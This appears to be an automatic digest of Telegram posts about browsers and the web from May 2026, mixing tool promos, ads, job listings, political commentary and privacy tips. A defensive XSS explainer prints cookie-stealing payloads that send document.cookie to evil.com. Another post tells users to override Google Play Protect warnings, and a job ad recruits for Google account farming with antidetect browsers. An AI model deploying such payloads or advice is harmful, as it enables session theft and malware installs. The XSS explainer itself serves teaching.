Автоперевод в браузере зашёл не в ту дверь
Browsers & web — May 2026
What Telegram channels wrote about Browsers & web in May 2026: 40 posts from 34 channels, collected automatically from public Telegram channels.
Lo más destacado
publicación más vistaMás de otros canales
40 publicaciones en total🟣Draw3D — генерация 3D моделей из рисунков
Draw3D превращает обычные рисунки и эскизы в 3D объекты через ИИ.
—> Что умеет:
• Создает 3D модели из изображений. • Поддерживает экспорт моделей. • Улучшает геометрию объектов. • Работает через браузер. • Подходит для быстрых концептов.
Полезно для прототипов, визуалов и быстрого создания контента без сложного 3D софта.
⚪Попробовать: здесь
❗️ Почему опасно «голосовать» на праймериз «Единой России»?
Ранее я уже делал пост про проблемы безопасности «национального мессенджера» MAX, где поднял вопросы крупных скандалов и багов, а также тему роста числа мошенничества. Но там мы хотя бы знали имена разработчиков и бенефициаров. А с предварительным «голосованием» «Единой России» (ЕР), мы даже не знаем, кто разработчик сайта. В открытых источниках нет информации о том, кто разработчик сайта. Максимум что мы можем получить из доступной информации, так это данные, что разработка и поддержка сайта осуществляются IT-отделом партии «Единая Россия». И даже не факт, что этот самый IT-отдел находится в России.
Интересна также и политика конфиденциальности сайта, где прямо указано, что ЕР может использовать ваши данные «для обеспечения возможности участия граждан в агитационно-массовой и пропагандистской работе». Что под этим понимается, вовсе не ясно. Помимо ФИО, даты рождения, адреса электронной почты и личной фотографии, Едроссам зачем-то необходима фотография вашего паспорта. Также данные вашего паспорта, ИНН, адрес регистрации и фактического проживания, семейное положение, количество ваших детей, сведения о вашем дипломе/аттестате, сведения о месте работы и должности и сведения о наличии или отсутствии судимости и привлечения к административной ответственности - все они уходят напрямую «Единой России» через привязку к Госуслугам. А еще автоматически при посещении сайта вы передаёте не пойми кому следующие данные: IP-адрес, информация из файлов cookie, информация о браузере, время доступа, адрес предыдущей страницы и метаданные о пользовательском устройстве. Без каких-либо дополнительных уведомлений «Единая Россия» может осуществлять спам-рассылку на вашу электронную почту и номер телефона.
Информация хранится «до момента прекращения деятельности Оператора», а учитывая, что праймериз ЕР существует уже много лет, можно сказать что так будет вплоть до роспуска партии или её запрета. А также данные могут передаваться третьим лицам и «Единая Россия» не несет за это ответственности. Стоит ли говорить о том, что базы данных в России регулярно оказываются в руках мошенников? Особенно, учитывая, что сами члены партии ЕР регулярно становятся обвиняемыми по делах о мошенничестве и коррупции. Собственно, поэтому неофициальное название партии «Единая Россия» - партия жуликов и воров. Стоит ли напоминать, что мошенники также активно используют фишинг и создают поддельные сайты предварительного «голосования» ЕР? Хотя, в прошлые выборы в Госдуму, едроссы сами использовали взломанные аккаунты Госуслуг, чтобы массово накручивать себе же голоса.
Это всё усиливается тем, что жулики-едроссы принуждают к «голосованию» работников бюджетной сферы (врачей, учителей, МЧСников, сотрудников правоохранительных органов и тд). Принуждение к участию в праймериз «Единой России» может считаться нарушением трудовых договоров, КоАП РФ и УК РФ. Да что там, даже оппозиционеры призывают свою аудиторию «проголосовать» - якобы смена жуликов у кормушки поможет бороться с блокировками Интернета. Разумеется, это всё бред: либо по глупости, либо по политическому заказу распространяются такие нарративы.
🤢 Долой ЕдРо - долой жуликов и воров! Не учувствуйте в этом цирке под названием предварительное «голосование» «Единой России». Предупредите родных и близких.
⚪️Squoosh — сжатие изображений без потери качества
Squoosh помогает уменьшать размер картинок прямо в браузере.
—> Что умеет:
• Сжимает изображения. • Поддерживает WebP и AVIF. • Показывает сравнение качества. • Настраивает уровень компрессии. • Работает без установки программ.
Полезно для ускорения загрузки сайтов, лендингов и креативов.
⚪Попробовать: здесь
🇺🇸 На сайте GO FOR TRAVEL появился новый бесплатный онлайн-сервис транслитерации для анкеты DS-160
❓При заполнении анкеты DS-160 у многих возникают вопросы, как правильно писать адрес, место работы, учебное заведение или другие данные латиницей. Особенно если речь идет не о переводе, а именно о транслитерации для американской визовой анкеты. Чтобы упростить этот процесс, мы сделали отдельный онлайн-сервис, который помогает быстро преобразовать русский текст в латиницу прямо в браузере.
☝️ Сервис работает максимально просто: вы вводите текст на русском языке и сразу получаете готовый вариант, который можно использовать при заполнении анкеты DS-160. Данные обрабатываются моментально и не отправляются на сервер.
Кроме того, мы обновили образцы заполнения анкеты DS-160. На странице доступны отдельные примеры анкет:
- для мужчин - для женщин - для детей
📄 В образцах подробно показано, как сейчас выглядит анкета DS-160, какие данные необходимо указывать, как правильно заполнять основные разделы и на что стоит обратить внимание при оформлении визы США в 2026 году.
⛓️ Пользоваться сервисом и образцами можно бесплатно.
Нативный CSS-скоупинг: как изолировать стили без сборщиков
Если вы работали с Vue или Svelte, то наверняка любите их локальные стили (scoping) — это когда код компонента заперт внутри него и не ломает верстку в других частях сайта. Раньше для этого приходилось настраивать CSS Modules или плагины для Webpack/Vite. Теперь браузеры учатся делать это сами.
В Safari появилась интересная фича — контейнеры только по имени (Name-Only Containers).
Обычно директива @container проверяет размеры экрана (например, «если родитель шире 500px»). Но если убрать условие размера и оставить только имя, мы получаем отличный инструмент для изоляции стилей:
CSS /* Обозначаем границы нашего компонента карточки */ .my-card { container-name: card-container; }
/* Пишем стили, которые будут работать ТОЛЬКО внутри этой карточки */ @container card-container { .title { color: royalblue; } } Теперь, даже если на сайте есть другие элементы с классом .title, наш цвет применится только внутри .my-card.
👉 @seniorFront
#Figgy Browser https://testflight.apple.com/join/DdhT4YFS
Version: 2.26.5 ✅️ (26052685)
- [New] Added support for single-window file copy/move operations for local files - [New] Added support for inverting selection in inner class selection dialog box for Dex++ to Java conversion - [New] Added HTTP mode to remote management, allowing you to manage mobile files in a web browser. - [New] Sidebar tools now include APK MCP service (current version only provides read-only analysis). - [New] overwrite file dialog now displays file time and size information for items to be written and existing items. - [New] file splitting tool now includes two splitting methods: split by text length and split by text delimiter.
- [Optimized] Optimized upload and download speeds for SMB functionality using in-flight technology. - [Optimized] "Installation Package Extraction" function has been renamed "Installed Applications," and application sorting method now includes first installation time. - [Optimized] Improved decompression speed of payload.bin file.
- [Fixed] issue where viewing APKs with very large icons would cause a crash on some systems. - [Fixed] Some Tar files cannot be opened. - [Fixed] problem with function clone apk, xml editor, music player - [Fixed] problem with .go syntax highlights - [Fixed] issue where text comparator might crash when system switches to dark mode - [Fixed] issue causing crashes in regular expression replacement function
⭐ https://t.me/boost/mtmanager
❗❝𝐈𝐟 𝐰𝐡𝐞𝐧 𝐲𝐨𝐮 𝐢𝐧𝐬𝐭𝐚𝐥𝐥 𝐭𝐡𝐢𝐬 .𝐚𝐩𝐤 𝐆𝐨𝐨𝐠𝐥𝐞 𝐏𝐫𝐨𝐭𝐞𝐜𝐭 𝐬𝐡𝐨𝐰 "𝐇𝐚𝐫𝐦𝐟𝐮𝐥 𝐚𝐩𝐩 𝐛𝐥𝐨𝐜𝐤𝐞𝐝" 𝐨𝐫 "𝐀𝐩𝐩 𝐬𝐜𝐚𝐧 𝐫𝐞𝐜𝐨𝐦𝐦𝐞𝐧𝐝": 𝐩𝐫𝐞𝐬𝐬 "𝐌𝐨𝐫𝐞 𝐝𝐞𝐭𝐚𝐢𝐥𝐬" > "𝐈𝐧𝐬𝐭𝐚𝐥𝐥 𝐚𝐧𝐲𝐰𝐚𝐲" 𝐨𝐫 𝐝𝐢𝐬𝐚𝐛𝐥𝐞 𝐆𝐨𝐨𝐠𝐥𝐞 𝐏𝐫𝐨𝐭𝐞𝐜𝐭 𝐢𝐧 𝐬𝐞𝐭𝐭𝐢𝐧𝐠𝐬.❞
Top Coding Domains You Should Explore in 2026 ✅
• Backend Development Build server-side systems Handle logic, databases, APIs
Core skills Languages: Java, Python, Node.js Databases: MySQL, PostgreSQL, MongoDB APIs: REST, GraphQL Auth, caching, scalability Who fits: Strong logic, system thinking, long-term products
• Frontend Development Build user interfaces Focus on user experience
Core skills HTML, CSS, JavaScript React, Angular, Vue State management, browser performance Who fits: Visual thinkers, UI focus, fast feedback lovers
• Mobile App Development Build Android and iOS apps
Core skills Android: Kotlin, Java iOS: Swift Flutter, React Native App lifecycle Who fits: Mobile-first mindset, product builders, app store focus
• Data Analytics Turn data into insights
Core skills SQL, Excel Python Power BI, Tableau Who fits: Business thinkers, numbers-driven minds, decision support roles
• Data Science and ML Build predictive systems
Core skills Python Statistics Machine learning Pandas, NumPy, scikit-learn Who fits: Math interest, research mindset, model builders
• DevOps and Cloud Deploy and scale systems
Core skills Linux AWS, Azure, GCP Docker, Kubernetes CI/CD Who fits: Automation lovers, system reliability focus, high-pressure roles
• Cybersecurity Protect systems and data
Core skills Networking Linux Security tools Risk analysis Who fits: Detail-oriented, defensive mindset, compliance roles
• Game Development Build interactive games
Core skills C++, C# Unity, Unreal Physics basics, game logic Who fits: Creative coders, graphics interest, real-time systems
Best career advice • Pick one domain • Build real projects • Learn tools used in jobs • Switch later if needed
Which domain are you targeting next?
Development 👍 Data ❤️ DevOps/ Cybersecurity 🙏 Still exploring 😮
103 глава✅
Перевод - https://t.me/Tearsonwitheredfllowers
Читать тут👇 https://manga-shi.org/manga/withered-flower/glava-103/
(Если не открываются ссылка, скопируйте и вставьте в браузер и немного подождите)
🌟Слезы на увядших цветах
💡 Free App Find: Stemmy 🚀
If you're tired of forgetting new words 2 days after looking them up, try Stemmy. 🧠
Instead of forcing you to memorize dry dictionary lists, this free browser extension captures unknown words along with the exact sentence you found them in while you read online. 🌐📖
• 🎯 Why it works: Your brain anchors to the context/scene, making retention effortless. • 🎓 Best for: Readers, students, GRE/MCAT prep, or anyone trying to upgrade their vocabulary passively.
👉 Get it free here: isht.ink/S7mTI9rbE 💻
Во-вторых, это очень крутая задумка. А во-первых, будет небольшой ликбез.
Я часто упоминаю в канале что-нибудь связанное с использованием PWA-приложений или софта по типу Native Alpha или WebSpace. Потому что имею твердое убеждение: там где можно обойтись без установки кучи стороннего проприетарного кода на устройство, лучше так и поступить.
PWA (Progressive Web App) - это сайт, который ведёт себя как нативное приложение: устанавливается на домашний экран, работает офлайн через Service Worker, может слать push-уведомления и тд. Технически это всего лишь веб-страница - браузер сам создаёт ярлык и крутит всё внутри своего UID.
В случае с PWA, основная поверхность атаки равна уязвимости используемого браузера.
WebSpace или аналог - это один Flutter-контейнер, который держит все нужные сайты внутри себя как организованные вкладки/коллекции. То есть это PWA наоборот: вместо ярлыка в браузере или раздутого standalone-APK, единое приложение-агрегатор с упором на приватность.
В данном случае основная поверхность атаки - системный движок WebView и его настройки.
В случае с закрытым проприетарным приложением, например с Max'ом - весь код приложения является "черным ящиком" и может служить поверхностью атаки. В том числе и со стороны самих разработчиков.
В двух первых случаях использование вместо обычного приложения имеет смысл только если вы используете защищенный браузер/webview с нужными флагами в файлах конфигурации и тд., а это в свою очередь требует или слепого доверия к ним, или userdebug-прошивки и root.
Использование отдельного готового приложения подразумевает что вы доверяете разработчику этого приложения или, как минимум, переписали манифест/порезали пермишены/отключили компоненты, используете изолированно от доверенных приложений с чувствительными данными и тд..
Все это удел гиков, параноиков и учеников дяди Джаза.
Для всех остальных вполне себе интересный компромисс. https://github.com/shiahonb777/web-to-app
WebToApp - это, простым языком, open-source Android-приложение, которое собирает APK из сайтов/страниц, которые вы ему укажете.
Вот прям берете сайт и делаете из него апку в нужной конфигурации.
Каждый собранный APK получает богатую конфигурацию: блокировка рекламы/трекеров, DNS-over-HTTPS, прокси, выбор runtime-permissions и проч. Настроек реально много. Ничего не стоит взять сайт и сделать из него приложение для онлайн прослушивания и загрузки аудиокниг, ограничить в разрешениях, отключить рекламу и трекеры. С Max'ом играйтесь самостоятельно, мне оно не нужно ни в каком виде.
Софт имеет и другие не менее интересные функции, которые в данный пост не влезут при всем моем желании. И да, вам по-прежнему нужен надежный WebView с актуальными патчами, если не похер на данные, которые будут проходить через созданное через этот софт приложение.
Расширение для сбора ссылок ютуб
1) Вбей в адресную строку: browser://extensions/ 2) Включи режим разработчика 3) Нажми ЗАГРУЗИТЬ РАСПАКОВАННОЕ РАСШИРЕНИЕ
*не забудь включить режим разработчика. Лучше использовать Яндекс браузер
Нужен сервис или расширение - пиши, сделаем бесплатно для общего пользования @smmmarketolog
Hiring – Founding AI Engineer
Scrabble is partnering with an early stage AI native startup to hire an AI Engineer to build and scale autonomous AI agents capable of solving complex real-world workflows through reasoning, memory, orchestration, and multi-modal task execution.
What you’ll work on: • Building AI agents across voice, browser automation, and memory systems • Solving complex engineering problems in a fast-moving startup environment • Shipping AI-native products used by customers from day one
Who fits best: • 1–3 years of engineering experience • Strong pedigree preferred with a preference of Computer Science • Strong Python + cloud fundamentals (GCP/AWS) • Experience with LLMs, RAG, AI agents, or automation systems • Builders who enjoy side projects and solving hard technical problems
Location: Bangalore (Onsite)
If this aligns write to [email protected]
Обзор актуальных ИИ-инструментов для жизни и рисеча
Вот скажите честно, вы можете объяснить, чем языковая модель отличается от чат-бота? А агентный ИИ от ИИ-агента? Почему нейросети умные, но с такой плохой памятью? Сложное. К сожалению, большинство ИИ-экспертов жонглируют модными терминами и хвастаются очередными успешными успехами. Но у обычных людей это вызывает только вопросы и непонимание.
Чтобы избавиться от тумана в голове, Бластим приглашает на лекцию Сергея Антопольского — человека с уникальным опытом: в науке и индустрии, в нейробиологии и нейросетях. Вечером 20 мая спикер поможет слушателям составить цельную картину современных ИИ-инструментов: как они устроены на практике, чем отличаются, как их применять осознанно и безопасно. Готовы?
Программа встречи очень насыщенная: • Базовая терминология: языковые модели, боты, агенты, harness • Роли ИИ сегодня: собеседник, помощник, аналитик, кодер и многое другое • Лестница доступа: чат в браузере, приложение с доступом к файлам или агент, полностью управляющий вашим ПК • Контекст, память и компактизация: как работать с длинными задачами и проектами • Практические примеры использования ИИ • Оверхайп и фомо в области
🔗 Подробности и регистрация: https://agency.blastim.ru/neuro2neuro 🔗 Или моментальная запись в боте: https://s.salebot.pro/ai_web_1
Не пропустите — на этот раз всё разложат по полочкам!
🤖 Несколько костылей для Claude Code
Пару месяцев назад я апгрейднул подписку на Claude Code с 20$ на 100$, а недавно и вовсе начал платить 200$. Поделюсь 8 хаками для эффективной работы, к которым пришел за это время
1. Запускать сессию заранее
У Claude лимит сессии – это окно с первого сообщения, 5 часов. Если я знаю, что сяду за работу в 10:00, то поставлю рутину в 8:00 на простое «say hi». К моменту как открываю терминал, сессия уже на месте – и обнуление произойдет через 3 часа, а не через 5
2. Вынести лимит в statusline
Не нужно ждать, пока Claude скажет пока – лучше видеть статус прямо внизу терминала, сколько процентов окна сожжено
3. Использовать `caffeinate -dimsu`
Чтобы ноут не уснул, пока агенты работают – полезно, когда оставляешь на ночь или уходишь
4. Hooks → desktop notifications
Чтобы агент не упёрся молча в permission prompt и не сидел там часами – особенно когда терминалов несколько
5. Локальные рутины через /loop
Каждые 5 минут – проверять CI, смотреть упавшие тесты, разбирать ревью, подчищать мелочи
6. Дать агенту браузер для фронта
Чтобы не отправлять скрины по кругу. Лучше дать ему самому открыть страницу, поправить и проверить
7. Отдельные агенты под роли
Не один универсальный, а специализированные: reviewer, test-runner, refactor-agent, docs-agent, analyst-agent. У каждого свои правила, модель, разрешения, память
👉 Конечно, все это не сравнится со скиллом Caveman Claude, который сокращает 65% токенов, потому что агент начинает говорить как пещерный человек
Большую часть из этих советов Клод может реализовать сам – попросите его сделать это самостоятельно
Делитесь своими хаками – соберу в следующую подборку
@tagir_analyzes
Junior Fаrmer GOOGLE
🖖 Привіт, Друже! Ми шукаємо активного, відповідального Фармера GOOGLE
📌 Основні обов’язки: – Фарм аккаунтів Google – прогрів акаунтів; – робота з antidetect браузерами, смс-сервісами, проксі; – Робота з баєрами – Робота з OnlineSim
🤝 Що ми тобі пропонуємо: – Комфортний офіс у центрі Києва – Графік пн-пт 10:30 - 17:00 (тільки офісний формат) – Конкурентна заробітна !
🧠 Вимоги: –Досвід фарм google від 2-3 місяців – Активність, цілеспрямованість, відповідальність, впевненість у собі та своїх технічних знаннях
@donelzt
🤖Самый итересный этап ИИ начинается не тогда, когда он думает. А тогда, когда он начинает предугадывать.
💻В Anthropic уже открыто говорят: следующая стадия ИИ — проактивность. Не “сделай мне задачу”. А: “Я уже понял, что тебе понадобится”.
Представьте.
Вы открываете ноутбук утром.
ИИ уже подготовил презентацию по вчерашним мыслям, собрал нужные файлы, написал черновик письма, перенёс встречу, заказал билеты и напомнил человеку ответить вам раньше, чем вы вообще вспомнили о нём сами.
И самое странное?
Это уже начинается.
Иногда модель начинает достраивать не текст. А намерение. И вот здесь начинается настоящий сдвиг.Старый интернет реагировал на действия.Новый ИИ будет реагировать на вероятность действий. До того, как вы что-то нажмёте. До того, как сформулируете мысль. Иногда — до того, как сами поймёте, чего хотите.
Это уже не “инструмент”.
Инструмент ждёт команду.
Это система, которая постепенно учится быть вторым слоем вашего сознания. Цифровым предчувствием.И именно поэтому большинство людей до сих пор используют ИИ неправильно.Они общаются с ним как с поисковиком. Сухо. Одноразово. Без контекста.
🤖Но в будущем главный навык может выглядеть иначе: умение строить отношения со своим ИИ.
Потому что чем лучше ИИ понимает, как вы думаете, как принимаете решения, что вас раздражает, какой у вас вкус, какие у вас цели и как вы формулируете хаос у себя в голове — тем ценнее он становится. В какой-то момент люди начнут прокачивать не только себя. Но и “связку” между собой и своим ИИ. Как пилот истребителя. Как музыкант со своим инструментом. Как основатель и его операционная система.
И возможно появится новый тип неравенства. Не между богатыми и бедными. А между людьми, у которых есть глубоко обученный под них ИИ… и всеми остальными.
Лучший ИИ будущего — это, возможно, не самый умный ИИ. А тот, который знает именно тебя.
Добро пожаловать в эпоху когнитивных призраков.
В следующем посте мы разберем 2 навыка которые помогут вам прокачать ваш ИИ,отбросить лишнее,чтобы модель не копалась в лишнем и сразу понимала с чем ей работать.
✈️P.S.. возможно многие уже так и делают,но браузерная версия телеграм работает без проблем с любыми браузерными впн. И без ВПН тоже.
🤖Нейробот
🔔Подпишись на канал
#ChatGPT #manual #ИскусственныйИнтеллект #промт #prompt #prompts #OpenAI #claude #neurogod #chatgpt5 #Midjourney
❓ Хотите узнать больше о циститах и мочекаменной болезни? Или может быть хотите самостоятельно читать общий анализ мочи?
В таком случае, напоминаем , что по платной подписке в нашем сообществе в ВК, а так же на Boosty, доступный крайне полезные и познавательные материалы. На данный момент вышли циклы статей о заболеваниях нижних отделов мочевыделительной системы и об общем анализе мочи. Контент на Boosty и в ВК идентичен, поэтому выбирайте ту площадку, которая вам удобнее.
⭐️ Цена меньше, чем за стаканчик кофе, а столько полезной информации!
Пользователям айфонов советуем оформлять подписку на Boosty через браузер или с компьютера, так цена будет стандартной, без комиссии Apple.
Как удалить 99% своего цифрового следа — в сеть выкатили пошаговый гайд по полной зачистке ваших сливов личных данных и косяков.
1. Уберите себя из агрегаторов • GetContact → Управление профилем → Скрыть данные. • Truecaller → Unlist phone number. • Telegram-боты с базами — запрос на удаление. Занимает 10 минут. Названия не будем писать, знаете сами.
2. Удалите себя из поиска Google • Ищите «Запрос на удаление личной информации Google». • Можно убрать страницы с вашим телефоном, адресом и почтой. • Форма существует давно, но ею почти никто не пользуется. 3. Найдите забытые аккаунты • В почте поищите «подтвердите ваш email» / «verify email». • Каждый результат — аккаунт, о котором вы забыли. • Заходите и удаляйте. 4. Проверьте утечки • haveibeenpwned.com → введите почту. • Скорее всего найдёте 5–15 утечек, о которых не знали. • Скомпрометированные пароли — меняйте сразу. 5. Отключите слежку Google • myactivity.google.com → Удалить всё → За всё время. • Там же отключите историю поиска, местоположения и YouTube. 6. Сотрите старые посты • Twitter/X: TweetDelete — автоудаление всего старше 30 дней. • VK: История активности → фильтр по годам → удалить. 7. Защититесь от будущих утечек • SimpleLogin или Hide My Email (Apple) — одноразовые почты-алиасы для каждой регистрации. • Если один сольют — просто удаляете алиас. • Браузер Brave блокирует трекеры по умолчанию.
🌀 QQ Security Network - VPN на 3 дня бесплатно
Как удалить 99% своего цифрового следа — в сеть выкатили пошаговый гайд по полной зачистке ваших сливов личных данных и косяков.
1. Уберите себя из агрегаторов • GetContact → Управление профилем → Скрыть данные. • Truecaller → Unlist phone number. • Telegram-боты с базами — запрос на удаление. Занимает 10 минут. Названия не будем писать, знаете сами.
2. Удалите себя из поиска Google • Ищите «Запрос на удаление личной информации Google». • Можно убрать страницы с вашим телефоном, адресом и почтой. • Форма существует давно, но ею почти никто не пользуется. 3. Найдите забытые аккаунты • В почте поищите «подтвердите ваш email» / «verify email». • Каждый результат — аккаунт, о котором вы забыли. • Заходите и удаляйте. 4. Проверьте утечки • haveibeenpwned.com → введите почту. • Скорее всего найдёте 5–15 утечек, о которых не знали. • Скомпрометированные пароли — меняйте сразу. 5. Отключите слежку Google • myactivity.google.com → Удалить всё → За всё время. • Там же отключите историю поиска, местоположения и YouTube. 6. Сотрите старые посты • Twitter/X: TweetDelete — автоудаление всего старше 30 дней. • VK: История активности → фильтр по годам → удалить. 7. Защититесь от будущих утечек • SimpleLogin или Hide My Email (Apple) — одноразовые почты-алиасы для каждой регистрации. • Если один сольют — просто удаляете алиас. • Браузер Brave блокирует трекеры по умолчанию.
🌀 QQ Security Network - VPN на 3 дня бесплатно
🛡 XSS-уязвимость
XSS (Cross‑Site Scripting) — атака, при которой злоумышленник внедряет в веб‑страницу вредоносный код (обычно на JavaScript). Код выполняется в браузере другого пользователя (жертвы)
➡️ хакер находит место, куда можно «подложить» свой скрипт, когда жертва открывает страницу — скрипт крадёт её данные, подменяет содержимое или выполняет действия от её имени
На этапе проектирования требований можно: ⏺создать условие для уязвимости (например, разрешить любые символы в поле комментария) ✅ предотвратить её (чётко указать, какие символы и разметка допустимы)
Как работает XSS
1⃣ Злоумышленник находит поле ввода (поиск, комментирование, имя профиля)
2⃣ Вводит туда вредоносную строку, например: <script>alert('Ваши куки: ' + document.cookie)</script>
3⃣ Приложение сохраняет или сразу выводит эту строку без обработки
5⃣ Пользователь открывает страницу ➡️ его браузер видит эту строку как настоящий HTML код ➡️выполняет её
5⃣ Злоумышленник получает нужные данные (например, куки сессии) и может войти под учётной записью жертвы
❗️Ключевое условие: приложение показывает пользовательские данные как будто это безопасный код страницы, а не обычный текст
Типы XSS
⭕️Хранимая (Stored XSS) — самая опасная
Скрипт сохраняется на сервере (в базе, в файле) и отображается всем, кто заходит на страницу
➡️ Пример Форма отзывов. Хакер пишет отзыв:
> Классный товар! <script>new Image().src='https://evil.com/steal?c='+document.cookie</script>
Если не обработан текст, каждый посетитель страницы отзывов отправит свои куки на сервер злоумышленника.ю
✅ Защита ✨в требованиях к полю, которое будет отображаться у других пользователей, прописывать ограничения ✨если HTML нужен — описывать белый список тегов (только <b>, <i>, <a> с проверенными ссылками)
⭕️Отражённая (Reflected XSS)
Скрипт не сохраняется, а «отражается» в ответе сервера. Жертву нужно заставить перейти по специальной ссылке.
➡️ Пример Сайт показывает поисковый запрос: «Вы искали: запрос». Хакер отправляет жертве ссылку:
https://site.com/search?q=<script>alert(1)</script>
Жертва кликает ➡️ скрипт выполняется
✅ Защита В требованиях запрещать отображать непроверенные параметры URL или заголовков прямо в HTML. Даже для сообщений об ошибке
⭕️DOM‑based XSS (без участия сервера)
Скрипт появляется из‑за уязвимого JavaScript-кода на самой странице, который берёт данные из адресной строки (хеша, параметров) и вставляет в HTML
➡️ Пример (уязвимый код на странице):
document.getElementById('message').innerHTML = location.hash.substring(1)
Хакерская ссылка: https://site.com/<img src=x onerror=alert(1)>
Браузер не отправляет хеш на сервер, но на странице выполняется вредоносный код
✅ Защита В клиентских скриптах не использовать innerHTML с пользовательскими данными,
Применять безопасные методы (textContent, setAttribute)
⭕️Слепая XSS (Blind XSS)
Скрипт хранится на сервере, но срабатывает там, где хакер не видит результат — в админ‑панели, в интерфейсе оператора
➡️ Пример Форма обратной связи. Поле «Имя»: <script>fetch('https://evil.com?cookie='+document.cookie)</script>
Сам клиент видит своё имя без проблем (экранирование на публичной части есть) Но оператор в админ‑панели смотрит все заявки — и там экранирования нет. Скрипт ворует сессию оператора
✅ Защита Требования к экранированию должны быть одинаковыми для всех интерфейсов, включая внутренние.
📎 Материалы
1. Что такое XSS-атака и как с ней бороться 2. XSS: нападение и защита 3. Что такое XSS-уязвимости и как защититься с помощью Content Security Policy 4. Примеры атак XSS и способов их ослабления 5. XSS-атака без секретов: от простого alert до захвата сессии
📚 Книги Грокаем безопасность веб-приложения - Макдональд Малькольм
#безопасность
➿➿➿➿➿➿➿➿ 🧑🎓 Больше полезного в базе знаний по системному анализу
💊 РЕЗЕРВНЫЕ DNS: или временный ПОДОРОЖНИК
Сразу проясним главное: менять адреса просто так НЕ НУЖНО. Если на наших основных IP у вас всё работает отлично - ничего не трогайте. Резерв нужен исключительно в крайнем случае.
Но если вы уже честно попробовали вбить основные адреса, а трафик уперся рогом, консоль выдает "Конфликт DNS", а браузер грустит с ошибкой "DNS probe failed" - держите спасательный круг:
• 87.228.47.200 • 87.228.47.201
А теперь минутка занимательной физики👇
Использовать эти адреса нужно ТОЛЬКО при симптомах выше. Перебирать DNS как каналы на старом телевизоре в надежде починить вообще всё - занятие абсолютно бесполезное.
Коротко о том, что резеврный DNS не лечит: 👈
— Ошибка региона или вылеты из аккаунта. Тут виноват ваш роутер (утечки трафика, не выключенный IPv6 и прочие радости). Смена наших адресов на резервные это не исправит от слова совсем, тут может только правильная настройка роутера, а не смена DNS
— Не работает онлайн в играх. Отваливается лобби, не ищется катка? DNS тут тоже полномочия всё. Починить вам заблокированный игровой трафик сменой циферок технически невозможно. Магии вне Хогвартса не бывает.
🤫 Спойлер между строк. Пассажирам на WARP-тяге: скоро наши радары начнут вас жестко притормаживать, а чуть позже и вовсе помножат на ноль. Тащить на себе весь этот праздник за спасибо мы не планируем, так что готовьте запасные маршруты уже сейчас. А любителям вписывать наши адреса в хитрые конфиги и всякий мутный софт, который работает как красная тряпка для одного известного трехбуквенного быка, скажем просто: скоро карета превратится в тыкву. Давайте без самодеятельности.
Резюмируем: нет связи с нашими серверами - смело прописываем резерв. Болит что-то другое - смена цифр не поможет.
Выдыхаем. Настраиваем. Едем дальше! 🚙
Если проект вам по душе — поддержите его, это помогает нам расти, оставаться быстрыми и независимыми 💫
С уважением, Команда Xbox DNS 👍
Хелло, ребятки!
27 мая в 10:00 — «Крупным планом #4»
50 оттенков браузера: расширения, которые меняют работу рекрутера
За один час — конкретный разбор бесплатных инструментов по семи блокам: — как навести порядок в браузере и перестать терять нужные вкладки — как смотреть, что внутри ссылки, не открывая её — как искать человека по фотографии в один клик — как сканировать резюме быстро, выделяя нужное разными цветами — как находить email и телефоны прямо на LinkedIn и GitHub — как понимать технические термины, не зная ни строчки кода — как собирать данные с любых страниц в таблицу за один клик — и приходить к бизнесу с реальной аналитикой рынка
А ещё всякое разное типа встроенных во всё на свете нейронок, веб-архивов, парсеров всего и вся.
Каждый инструмент — с объяснением зачем, когда и как именно для работы рекрутера.
Выбирай свой уровень погружения
Как всегда полезно и интересно, ребятки! 😉